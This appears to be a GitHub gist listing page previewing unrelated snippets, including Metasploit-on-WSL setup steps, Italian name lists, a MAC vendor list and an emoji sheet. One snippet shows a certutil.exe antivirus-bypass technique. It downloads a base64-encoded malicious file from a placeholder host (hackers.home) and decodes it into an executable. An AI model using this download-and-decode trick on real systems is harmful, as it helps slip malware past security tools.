Image source
https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png
Try resize it!

This post links my 3Box profile to my Github account! Web3 social profiles by 3Box. | |
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅ | |
Create your profile today to start building social connection and trust online at https://3Box.io/ |
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
1.) Enable Developer Mode | |
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
2.) Enable Windows Subsystem for Linux | |
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
3.) Reboot |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti | |
---------------- | |
abbondanza | |
abu | |
accadia |
-- DISCLAIMER -- | |
il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani") | |
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo | |
è pertanto altamente possibile che ci siano errori o refusi | |
non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti | |
---------------- | |
abaco | |
abbondanza | |
abbondanzia |
# script by JonnyBanana | |
#https://github.com/JonnyBanana | |
# this simple script asks to assign a name to a variable | |
#and then asks how many variables it must print on the monitor | |
# the output is like: | |
# a1 = '' | |
# a2 = '' | |
# a3 = '' | |
# a4 = '' | |
# a5 = '' |
000000 Officially Xerox | |
000001 SuperLAN-2U | |
000002 BBN (was internal usage only, no longer used) | |
000003 XEROX CORPORATION | |
000004 XEROX CORPORATION | |
000005 XEROX CORPORATION | |
000006 XEROX CORPORATION | |
000007 XEROX CORPORATION | |
000008 XEROX CORPORATION | |
000009 powerpipes? |
# certutil.exe bypass av on download + base64 Decoding | |
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
#into the executable. https://www.browserling.com/tools/file-to-base64 | |
#This is illustrated in Xavier Mertens handler diary. | |
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
C:\Temp>certutil.exe -decode bad.txt bad.exe |
People
![]() :bowtie: |
:smile: |
:laughing: |
---|---|---|
:blush: |
:smiley: |
:relaxed: |
:smirk: |
:heart_eyes: |
:kissing_heart: |
:kissing_closed_eyes: |
:flushed: |
:relieved: |
:satisfied: |
:grin: |
:wink: |
:stuck_out_tongue_winking_eye: |
:stuck_out_tongue_closed_eyes: |
:grinning: |
:kissing: |
:kissing_smiling_eyes: |
:stuck_out_tongue: |
# Treat all files in this project as binary. This enables atomic | |
# checkins (no merges, these are signed files) and it preserves | |
# CRLF line endings | |
* binary |